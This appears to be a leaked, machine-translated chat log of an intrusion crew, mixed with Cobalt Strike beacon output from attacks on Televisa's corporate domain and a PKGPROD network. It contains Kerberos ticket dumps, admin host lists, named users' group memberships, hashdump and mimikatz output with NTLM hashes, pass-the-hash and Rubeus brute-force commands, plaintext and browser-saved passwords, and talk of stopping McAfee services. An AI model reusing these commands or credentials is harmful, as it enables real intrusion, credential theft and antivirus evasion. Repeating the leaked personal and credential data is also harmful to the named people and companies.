	   Service Name (02) : krbtgt ; CORP.TELEVISA.COM.MX ; @ CORP.TELEVISA.COM.MX
	   Target Name (--) : @ CORP.TELEVISA.COM.MX
	   Client Name (01) : CORPKLHLQRD01$ ; @ CORP.TELEVISA.COM.MX ( $$Delegation Ticket$$ )
	   Flags 60210000 : name_canonicalize ; pre_authenticated ; forwardable ;
	   Session Key : 0x00000012 - aes256_hmac
	     ba056c87b98f366fc26d590017bc2139382f8b86a0f465afe8a4e71640a0c88f
	   Ticket : 0x00000012 - aes256_hmac ; kvno = 8 [...]
	 [00000001]
	   Start/End/MaxRenew: 2/11/2021 7:38:28 PM ; 2/12/2021 5:38:28 AM ; 2/18/2021 7:38:28 PM
	   Service Name (02) : krbtgt ; CORP.TELEVISA.COM.MX ; @ CORP.TELEVISA.COM.MX
	   Target Name (02) : krbtgt ; CORP.TELEVISA.COM.MX ; @ CORP.TELEVISA.COM.MX
	   Client Name (01) : CORPKLHLQRD01$ ; @ CORP.TELEVISA.COM.MX ( CORP.TELEVISA.COM.MX )
	   Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
	   Session Key : 0x00000012 - aes256_hmac
	     e0b11d57673a011ecb886cf4794b8a40dc8edcc3abb9f8fa27413da80ab00eea
	   Ticket : 0x00000012 - aes256_hmac ; kvno = 8 [.]
``on the available server check the ticket during working hours+in corp? what domain are you in? is there a ticket kerb? | 0x3e4 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | krbtgt/CORP.TELEVISA.COM.MX | 2/12/2021 5:38:29 AM ``
 ---------------------------------------------------------------------------------------------------------------------------------------
 | LUID | UserName | Service | EndTime |
 ---------------------------------------------------------------------------------------------------------------------------------------
 | 0x3e4 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | krbtgt/CORP.TELEVISA.COM.MX | 2/12/2021 5:38:29 AM
 | 0x3e4 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | DNS/corpklhlqdc01.corp.televisa.com.mx | 2/12/2021 5:38:29 AM |
 | 0x3e4 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | GC/CORPKLHLQDC01.corp.televisa.com.mx/televisa.com.mx | 2/12/2021 5:38:29 AM |
 | 0x3e4 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | ldap/corpklhlqdc01.corp.televisa.com.mx/corp.televisa.com.mx | 2/12/2021 5:38:29 AM
 | 0x3e4 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | cifs/CORPKLHLQDC01.corp.televisa.com.mx | 2/12/2021 5:38:28 AM |
 | 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | krbtgt/CORP.TELEVISA.COM.MX | 2/12/2021 5:38:28 AM |
 | 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | cifs/CORPKLHLQDC01 | 2/12/2021 5:38:28 AM |
 | 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | cifs/corpsfedc02 | 2/12/2021 5:38:28 AM |
 | 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | cifs/CORPSFEVMMLIB | 2/12/2021 5:38:28 AM |
 | 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | host/CORPSFECRT03.corp.televisa.com.mx | 2/12/2021 5:38:28 AM |
 | 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | RPCSS/CORPSFECRT03.corp.televisa.com.mx | 2/12/2021 5:38:28 AM |
 | 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | cifs/CORPKLHLQDC01.corp.televisa.com.mx/corp.televisa.com.mx | 2/12/2021 5:38:28 AM
 | 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | CORPKLHLQRD01$ | 2/12/2021 5:38:28 AM |
 | 0x3e7 | corpklklqrd01$ @ CORP.TELEVISA.COM.MX | LDAP/CORPKLHLQDC01.corp.televisa.com.mx | 2/12/2021 5:38:28 AM |
 | 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | ldap/corpklhlqdc01.corp.televisa.com.mx/corp.televisa.com.mx | 2/12/2021 5:38:28 AM
 ---------------------------------------------------------------------------------------------------------------------------------------

``No, there is no check through the rubeusdlya abuza gpoja about the triage ticketmikaty same about pass ze ticket? I looked at a couple of servers before yesterday, before they flew away, where were YES tickets, but they are not katiliv prochekali on the servers available ticketmiket?well, according to bludhound that they do not have rights there, except genericAll)))) the group admin winel no access to cars in the group admin winel) yes, there is no access to that, check?it means re-check on the cars where related groups through `execute-assembly SharpSharesNG.exe shares list corp_srv.txt --alive --public-only ` see what car has access to the car, let me send a list of cars on each of the polzakov (on the polzakovak we are interested) `
OU=Grupos Globales
SNG15690.corp.televisa.com.mx
SFE15693.corp.televisa.com.mx
CHA15694.corp.televisa.com.mx
SNG15689.corp.televisa.com.mx
SNG15688.corp.televisa.com.mx
CHA15695.corp.televisa.com.mx

OU=SantaFe
SFCITRIXAPLAN2.corp.televisa.com.mx
SFCITRIXCLCONN2.corp.televisa.com.mx
SFCITRIXAPUAT1.corp.televisa.com.mx
QROCTXCLCONN1.corp.televisa.com.mx
SFCITRIXAPLAN1.corp.televisa.com.mx
CORPKIOBZT02_C1.corp.televisa.com.mx
CORPSFEWEB07.corp.televisa.com.mx
corpkiodb08.corp.televisa.com.mx
corpkioapp05.corp.televisa.com.mx
CORPSFEWEB09.corp.televisa.com.mx
CHA19003.corp.televisa.com.mx
SFE18620.corp.televisa.com.mx
SFE18588.corp.televisa.com.mx
SFE18590.corp.televisa.com.mx
CHA18594.corp.televisa.com.mx
cha19095.corp.televisa.com.mx
SFE18617.corp.televisa.com.mx
SNG18625.corp.televisa.com.mx
SFE18595.corp.televisa.com.mx
SNG15690.corp.televisa.com.mx
SFE15693.corp.televisa.com.mx
CHA15694.corp.televisa.com.mx
SNG15689.corp.televisa.com.mx
SNG15688.corp.televisa.com.mx
CHA15695.corp.televisa.com.mx
SFE18603.corp.televisa.com.mx
SFE18582.corp.televisa.com.mx
SFE19424.corp.televisa.com.mx
SFE17146.corp.televisa.com.mx
SFE20924.corp.televisa.com.mx
SFE19785.corp.televisa.com.mx
SFE20926.corp.televisa.com.mx
SFE19784.corp.televisa.com.mx
SFE18630.corp.televisa.com.mx
SFE20231.corp.televisa.com.mx
SFE12045.corp.televisa.com.mx
SFE17310.corp.televisa.com.mx
SFE20229.corp.televisa.com.mx
SFE15467.corp.televisa.com.mx
SFE16966.corp.televisa.com.mx
SFE16221.corp.televisa.com.mx
SFE18520.corp.televisa.com.mx
SFE20228.corp.televisa.com.mx
SFE20918.corp.televisa.com.mx
SFE15474.corp.televisa.com.mx
SFE20230.corp.televisa.com.mx
SFE20227.corp.televisa.com.mx
SFE18287.corp.televisa.com.mx
SFE19786.corp.televisa.com.mx
SFE21999.corp.televisa.com.mx
SFE14238.corp.televisa.com.mx
SFE21994.corp.televisa.com.mx
SFE19195.corp.televisa.com.mx
SFE14487.corp.televisa.com.mx
SFE14491.corp.televisa.com.mx
SFE14714.corp.televisa.com.mx
SFE22582.corp.televisa.com.mx
SFE22767.corp.televisa.com.mx
SFE20792.corp.televisa.com.mx
CORPKLHLMHAPT.corp.televisa.com.mx
SFE22807.corp.televisa.com.mx
Digital-09.corp.televisa.com.mx
CORPKLHLRSAPT.corp.televisa.com.mx
CORPKLHLATAP1T.corp.televisa.com.mx
CORPKLHLATAP2T.corp.televisa.com.mx
SFE17796.corp.televisa.com.mx
SFCITRIXPROV1.corp.televisa.com.mx
CORPKLHLRSAP2P.corp.televisa.com.mx
CORPKLHLRSAPU.corp.televisa.com.mx
CORPKLHLRSAP1P.corp.televisa.com.mx
CORPKLHLATAP4P.corp.televisa.com.mx
SFCITRIXAPUAT2.corp.televisa.com.mx
CORPKLHLATAP2P.corp.televisa.com.mx
SFCITRIXSFRONT1.corp.televisa.com.mx
SFCITRIXSQLMR1.corp.televisa.com.mx
SFCITRIXSQLMR2.corp.televisa.com.mx
SFCITRIXPRDRS.corp.televisa.com.mx
QROCITRIXSQLMR1.corp.televisa.com.mx
SFCITRIXPRDATS.corp.televisa.com.mx
QROCTIXAPLAN1.corp.televisa.com.mx
CORPKLHLATAP1U.corp.televisa.com.mx
SFCITRIXSQLMR3.corp.televisa.com.mx
SFCTXPRFM1.corp.televisa.com.mx
CORPKLHLATAP5P.corp.televisa.com.mx
QROCTXPROV1.corp.televisa.com.mx
CORPKLHLATAP2U.corp.televisa.com.mx
QROCTXPRFM1.corp.televisa.com.mx
QROCTXSTFRONT1.corp.televisa.com.mx
CORPKLHLATAP1P.corp.televisa.com.mx
SFCITRIXPROV2.corp.televisa.com.mx
SFCITRIXSFRONT2.corp.televisa.com.mx
SFCITRIXCLCONN1.corp.televisa.com.mx
CORPKLHLATAP3P.corp.televisa.com.mx
SFCTXPRFM2.corp.televisa.com.mx
CORPSFECOD003.corp.televisa.com.mx
CORPSFECOD002.corp.televisa.com.mx
CORPSFECOD001.corp.televisa.com.mx
TVSACHALTVC03.corp.televisa.com.mx
CORPSFEBDP119.corp.televisa.com.mx
xchange01.corp.televisa.com.mx
CORPSFEBDQA02.corp.televisa.com.mx
ORPRAP002.corp.televisa.com.mx
ORPRAP008.corp.televisa.com.mx
ORQASRV001.corp.televisa.com.mx
ORDVAP005.corp.televisa.com.mx
ORPRAP005.corp.televisa.com.mx
ORDEVSRV001.corp.televisa.com.mx
ORPRAP003.corp.televisa.com.mx
ORPRWB002.corp.televisa.com.mx
ORPRWB001.corp.televisa.com.mx
ORDVAP004.corp.televisa.com.mx
CORPSFEAPLP224.corp.televisa.com.mx
instance-202001.corp.televisa.com.mx
ORQAAP008.corp.televisa.com.mx
ORQAAP007.corp.televisa.com.mx
ORDVAP002.corp.televisa.com.mx
ORPRAP004.corp.televisa.com.mx
ORDVAP001.corp.televisa.com.mx
CORPSFEBDP140.corp.televisa.com.mx


CN=reto-admin
SFE22614.corp.televisa.com.mx

CN=Admin_Wintel
CORPKIOBZT02_C1.corp.televisa.com.mx
CORPSFEWEB07.corp.televisa.com.mx
corpkiodb08.corp.televisa.com.mx
corpkioapp05.corp.televisa.com.mx
CORPSFEWEB09.corp.televisa.com.mx
CORPSFECOD003.corp.televisa.com.mx
CORPSFECOD002.corp.televisa.com.mx
CORPSFECOD001.corp.televisa.com.mx
TVSACHALTVC03.corp.televisa.com.mx
CORPSFEBDP119.corp.televisa.com.mx
xchange01.corp.televisa.com.mx
CORPSFEBDQA02.corp.televisa.com.mx
ORPRAP002.corp.televisa.com.mx
ORPRAP008.corp.televisa.com.mx
ORQASRV001.corp.televisa.com.mx
ORDVAP005.corp.televisa.com.mx
ORPRAP005.corp.televisa.com.mx
ORDEVSRV001.corp.televisa.com.mx
ORPRAP003.corp.televisa.com.mx
ORPRWB002.corp.televisa.com.mx
ORPRWB001.corp.televisa.com.mx
ORDVAP004.corp.televisa.com.mx
CORPSFEAPLP224.corp.televisa.com.mx
instance-202001.corp.televisa.com.mx
ORQAAP008.corp.televisa.com.mx
ORQAAP007.corp.televisa.com.mx
ORDVAP002.corp.televisa.com.mx
ORPRAP004.corp.televisa.com.mx
ORDVAP001.corp.televisa.com.mx
CORPSFEBDP140.corp.televisa.com.mx


CN=ISA Administracion Wintel aka CN=Admin_Wintel aka CN=Servidores Administrados Wintel Parametros PW CORP
CORPKIOBZT02_C1.corp.televisa.com.mx
CORPSFEWEB07.corp.televisa.com.mx
corpkiodb08.corp.televisa.com.mx
corpkioapp05.corp.televisa.com.mx
CORPSFEWEB09.corp.televisa.com.mx
CORPSFECOD003.corp.televisa.com.mx
CORPSFECOD002.corp.televisa.com.mx
CORPSFECOD001.corp.televisa.com.mx
TVSACHALTVC03.corp.televisa.com.mx
CORPSFEBDP119.corp.televisa.com.mx
xchange01.corp.televisa.com.mx
CORPSFEBDQA02.corp.televisa.com.mx
ORPRAP002.corp.televisa.com.mx
ORPRAP008.corp.televisa.com.mx
ORQASRV001.corp.televisa.com.mx
ORDVAP005.corp.televisa.com.mx
ORPRAP005.corp.televisa.com.mx
ORDEVSRV001.corp.televisa.com.mx
ORPRAP003.corp.televisa.com.mx
ORPRWB002.corp.televisa.com.mx
ORPRWB001.corp.televisa.com.mx
ORDVAP004.corp.televisa.com.mx
CORPSFEAPLP224.corp.televisa.com.mx
instance-202001.corp.televisa.com.mx
ORQAAP008.corp.televisa.com.mx
ORQAAP007.corp.televisa.com.mx
ORDVAP002.corp.televisa.com.mx
ORPRAP004.corp.televisa.com.mx
ORDVAP001.corp.televisa.com.mx
CORPSFEBDP140.corp.televisa.com.mx
``memberOf: CN=ISA Full Access users in the group have full access either to cyctrics or to vnp look at adjacent groups in the found pksopopods and so ongety getovy not program code``.
>memberOf: CN=PKIEnrollGP,OU=PKI Enroll,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=reto-admin,CN=Users,DC=corp,DC=televisa,DC=com,DC=mx
>dNSHostName: SFE22614.corp.televisa.com.mx
```
all that showed from `reto-admin````
>memberOf: CN=ISA Administracion Wintel,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
``All PCs from these groups''.
>memberOf: CN=ISA Full Access,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=adminvirt,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=reto-admin,CN=Users,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Admin_Wintel,OU=Users,OU=HP Wintel,DC=corp,DC=televisa,DC=com,DC=mx
``These are the admins''.
>memberOf: CN=Admin_Wintel,OU=Users,OU=HP Wintel,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Servicio Basico,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Internet2 H-Q,OU=Grupos Locales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=impresoras_santafe,CN=Users,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=PKITelevisaUserWireless,OU=PKI Enroll,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=reto-admin,CN=Users,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=adminvirt,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=SCVMMHPUsers,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=ISA Accesos Unicos,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=ISA Full Access,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>sAMAccountName: jajimenezar
```
```
>memberOf: CN=IMP-CORP,OU=Servicio_Impresion,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Admin_Wintel,OU=Users,OU=HP Wintel,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Print_Lanier,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Servicio Basico,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=PKITelevisaUserWireless,OU=PKI Enroll,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Wintel,OU=Users,OU=HP Wintel,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=reto-admin,CN=Users,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=ISA Administracion Wintel,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=User_PSO,OU=Grupos PSOs,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=adminvirt,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=ISA Accesos Unicos,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=ISA Full Access,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Internet3,OU=Grupos Locales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>sAMAccountName: manhernandez
```
```
>memberOf: CN=IMP-CORP,OU=Servicio_Impresion,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Admin_Wintel,OU=Users,OU=HP Wintel,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Servicio Basico,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=impresoras_santafe,CN=Users,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=CORPSFEAPP05_READ,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=PKITelevisaUserWireless,OU=PKI Enroll,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=reto-admin,CN=Users,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=ISA Administracion Wintel,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=User_PSO,OU=Grupos PSOs,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=adminvirt,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=ISA Full Access,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Internet3,OU=Grupos Locales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>sAMAccountName: ldguzmanj
```
```
>memberOf: CN=IMP-CORP,OU=Servicio_Impresion,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Admin_Wintel,OU=Users,OU=HP Wintel,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=impresoras_santafe,CN=Users,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=PKITelevisaUserWireless,OU=PKI Enroll,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Wintel,OU=Users,OU=HP Wintel,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Servicio Medio,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=reto-admin,CN=Users,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=ISA Administracion Wintel,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Servicio Personal IT,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=adminvirt,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=SCVMMHPUsers,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=ISA Full Access,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Internet3,OU=Grupos Locales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=STAFE_m_PSO,OU=STAFE_m-m,OU=Password,DC=corp,DC=televisa,DC=com,DC=mx
>sAMAccountName: mgmayetg
``each user you have a password from[ ](https://mediaeveryone.com/group/corp-televisa-com-mx?msg=JDGNJWsKSwif4Rtxi) each admin can?one message plus all the bundles are falling off each userf me so all deaf in general have moved a little further into the trasttoche all the cars where they can go check the cars 4 admins what do you have? but in the near future waiting for the farm for kerbs)not yet information or under php on the wind) anyone searched for oracle?I would generally make an emphasis on services that are used in the networks, in addition to those that have passed lpe and can look for modules so if we do not have time for weekdays we will have busy weekends we need for a week at least 3 networks to close completely in the Mon will come new sessions sleep and rest next week will be difficult, right?i hope it's Saturday-Saturday = weekend:thumbsup:let's go homeDa@tl1supportedrubbit really fall asleep at the keyboard go home already? for domain accounts can not be so passes may be different (i think so)he is listed as yes but he and LAa is not he so``?
Result：
Not Found, it is being cracked by our background system.
Please wait up to 5 days. A notification email will be sent to you when it is cracked successful , otherwise it is cracked failure.
``Checked@user7`STAKC.local\sysadmin ff928c9f7bce0d834658c1436381494e``[ ](https://mediaeveryone.com/channel/general?msg=yBPXxCfaa9nF87Rzh) in which grid? Objects gettrunda have you checked the users by group? almost 2120659 Objects gettrunda and not 30aOn the second network (mine) only 20+ pk in #snpartners-coma we have 30k pk in the network yes? well there on some cars LA are domain users more, LA only hashclir LA?those hashes as I understood not valid and LA we do not have? and only he alone on the key machines, and on other machines he goes through the local admin only 1 DA without a krede not go anywhere, got all the possible from those machines on which the ducked second network?here yes it's been a week without a declarationuffhough to one yes it's practice so droptestani)) did not try this "childproof" special when the POC is not completely usable* correct only if you're going to use POC directly from githab which does not contribute to it myself yet, if you can - share how you started) try it;- )you can to @tl1 =)))) on the working machines do not need to keep anything other than the "client" application, it is not a correct step to take them, it is better to have a separate VPS remote for thatspaskPack5156the same as wasminutka@tl1 have the ability to recognize the password ?
```
 * Username : Linux
 * Domain : PKGPROD
 * NTLM : c40ce4eab245d09bead615fd67e59a77
 * SHA1 : b6fc4dbe67cd7fcc4278a842803c0ff294098f57
 * DPAPI : b4172b5b7931728b8f4abb6a6f85b2f2
``Which service to stop?
SERVICE_NAME: macmnsvc
DISPLAY_NAME: McAfee Agent Common Services
        TYPE : 10 WIN32_OWN_PROCESS
        STATE : 4 RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE : 0 (0x0)
        SERVICE_EXIT_CODE : 0 (0x0)
        CHECKPOINT : 0x0
        WAIT_HINT : 0x0

SERVICE_NAME: masvc
DISPLAY_NAME: McAfee Agent Service
        TYPE : 10 WIN32_OWN_PROCESS
        STATE : 4 RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN)
        WIN32_EXIT_CODE : 0 (0x0)
        SERVICE_EXIT_CODE : 0 (0x0)
        CHECKPOINT : 0x0
        WAIT_HINT : 0x0

SERVICE_NAME: McAfeeFramework
DISPLAY_NAME: McAfee Agent Backwards Compatibility Service
        TYPE : 10 WIN32_OWN_PROCESS
        STATE : 4 RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE : 0 (0x0)
        SERVICE_EXIT_CODE : 0 (0x0)
        CHECKPOINT : 0x0
        WAIT_HINT : 0x0

SERVICE_NAME: mfemms
DISPLAY_NAME: McAfee Service Controller
        TYPE : 10 WIN32_OWN_PROCESS
        STATE : 4 RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE : 0 (0x0)
        SERVICE_EXIT_CODE : 0 (0x0)
        CHECKPOINT : 0x0
        WAIT_HINT : 0x0

SERVICE_NAME: mfevtp
DISPLAY_NAME: McAfee Validation Trust Protection Service
        TYPE : 10 WIN32_OWN_PROCESS
        STATE : 4 RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE : 0 (0x0)
        SERVICE_EXIT_CODE : 0 (0x0)
        CHECKPOINT : 0x0
        WAIT_HINT : 0x0

SERVICE_NAME: mfewc
DISPLAY_NAME: McAfee Endpoint Security Web Control Service
        TYPE : 10 WIN32_OWN_PROCESS
        STATE : 4 RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE : 0 (0x0)
        SERVICE_EXIT_CODE : 0 (0x0)
        CHECKPOINT : 0x0
        WAIT_HINT : 0x0

``````
beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82501 bytes
[+] received password hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
User:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:b3b0692c09bb03d1e67fae2a98952a2f:::
``and where is the hashdumpdown result of the system? Most likely the av is fighting to run this utility``.
beacon> shell net localgroup Administrators
[*] Tasked beacon to run: net localgroup Administrators
[+] host called home, sent: 60 bytes
[+] received output:
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
PKGPROD\Domain Admins
PKGPROD\jess
User
The command completed successfully.

``Local admins what?'' passwords don't match
```
beacon> execute-assembly Rubeus.exe brute /users:C:\ProgramData\user.txt /password:C:\ProgramData\pass.txt /dc:2K12SERVER
[*] Tasked beacon to run .NET program: Rubeus.exe brute /users:C:\ProgramData\user.txt /password:C:\ProgramData\pass.txt /dc:2K12SERVER
[+] host called home, sent: 320213 bytes
[+] received output:

   ______ _
  (_____ \ | |
   _____) )_ _| |__ _____ _ _ ___
  | __ /| | | | _ \| ___ | | | |/___)
  | | \ \| |_| | |_) ) ____| |_| |___ |
  |_| |_|____/|____/|_____)____/(___/

  v1.5.0

[+] Valid user => Administrator
[+] Valid user => linux
[+] Valid user => micro
[+] Valid user => micro2
[+] Valid user => mtsi
[+] Valid user => PAC
[+] Valid user => srivera
[+] Valid user => timesavers

[-] Done: No credentials were discovered :'(

Wrong. It's okay.
User name jess
Full Name jess
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 8/23/2019 1:08:43 PM
Password expires Never
Password changeable 8/24/2019 1:08:43 PM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 9/21/2020 9:55:17 AM

Logon hours allowed All

Local Group Memberships
Global Group memberships *CatalogAccess *SalesAccess
                             *InventoryAccess *Domain Users
The command completed successfully.

``So wait, about Jess we're talking about hash has not changed, if the password has not changed the other thing set? ``Password changeable 6/13/2014 11:20:21 AM ``A password changed the logon 7/16/2020 2:06:23 PM ``Check if you changed ``net user ``a1fd693cdc0a22a5abede17e517df308 ``Where did Jess have a new hash ?

```
Authentication Id : 1 ; 467262273 (00000001:1bd9db41)
Session : NewCredentials from 2
User Name : jess
Domain : PKGPROD
Logon Server : (null)
Logon Time : 9/21/2020 9:00:27 AM
SID : S-1-5-21-4059064934-1889560214-2984304678-1162
	msv :
	 [00000003] Primary
	 * Username : jess
	 * Domain : PKGPROD
	 * NTLM : a1fd693cdc0a22a5abede17e517df308
	 * SHA1 : 490a64b492e39b2f40fcfc2472b702b619feab5e
	 * DPAPI : 8e5b8c5beefe8319c0865ea259ad40af
``I think I'm doing something wrong.
```
beacon> mimikatz sekurlsa::pth /user:Linux /domain:PKGPROD /ntlm:c40ce4eab245d09bead615fd67e59a77 /run "net use * "\\192.168.168.10\C$" /persistent:no"
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:Linux /domain:PKGPROD /ntlm:c40ce4eab245d09bead615fd67e59a77 /run "net use * "\\192.168.168.10\C$" /persistent:no" command
[+] host called home, sent: 706119 bytes
[+] received output:
user : Linux
domain : PKGPROD
program : cmd.exe
impers. : no
NTLM : c40ce4eab245d09bead615fd67e59a77
  | PID 33388
  | TID 35340
  | LSA Process is now R/W
  | LUID 1 ; 1028986815 (00000001:3d5517bf)
  \_ msv1_0 - data copy @ 000001FA427FBC20 : OK !
  \kerberos - data copy @ 000001FA41E5A6A8
   \_ aes256_hmac -> null
   \_ aes128_hmac -> null
   \_ rc4_hmac_nt OK
   \_ rc4_hmac_old OK
   \_ rc4_md4 OK
   \_ rc4_hmac_nt_exp OK
   \_ rc4_hmac_old_exp OK
   \_ *Password replace @ 000001FA41DB24E8 (32) -> null
``Checked this password with other domain admins?
--- Chromium Credential (User: jess) ---
URL : https://cw.shipandsave.com/
Username : PKGPROD@ASCENTGL.COM
Password : RATER100

--- Chromium Credential (User: jess) ---
URL : https://rrts.mercurygate.net/
Username : PKGPRODUCTS@ASCENTGL.COM
Password : RATER100

--- Chromium Credential (User: jess) ---
URL : https://workforcenow.adp.com/
Username : Jessikinha777.
Password :

Just in case: don't forget to remove Linux from the brutadata list, let's go the usual way
we have a pass with a single YES
check other domain admins for this password check how many attempts on this username's wrong password, I didn't get it +@user5 in your team? You guys are nearby, don't you communicate?) I thought I was the only one who wouldn't use it, but everyone did
user2-2 beacon> shell net use * "\192.168.168.10\C$" /persistent:no /user:PKGPROD\Linux Pack5156
[*] Tasked beacon to run: net use * "\\192.168.168.10\C$" /persistent:no /user:PKGPROD\Linux Pack5156
[+] host called home, sent: 106 bytes
[+] host called home, sent: 19 bytes
[+] received output:
System error 86 has occurred.

The specified network password is not correct.

You still have about two more tries to try if it doesn't fit, it will break the account)
user2-3 beacon> shell net use G: \192.168.168.15\C$\temp /user:PKGPROD\Linux Pack5156
[*] Tasked beacon to run: net use G: \192.168.168.15\C$\temp /user:PKGPROD\Linux Pack5156
[+] host called home, sent: 95 bytes
[+] received output:
System error 86 has occurred.

The specified network password is not correct.


user2-3 beacon> shell net use G: \192.168.168.66\C$\temp /user:PKGPROD\Linux Pack5156
[*] Tasked beacon to run: net use G: \192.168.168.66\C$\temp /user:PKGPROD\Linux Pack5156
[+] host called home, sent: 95 bytes
[+] received output:
System error 86 has occurred.

The specified network password is not correct.


user2-3 beacon> shell net use G: \192.168.168.66\C$\temp /user:PKGPROD\jess Payables5150
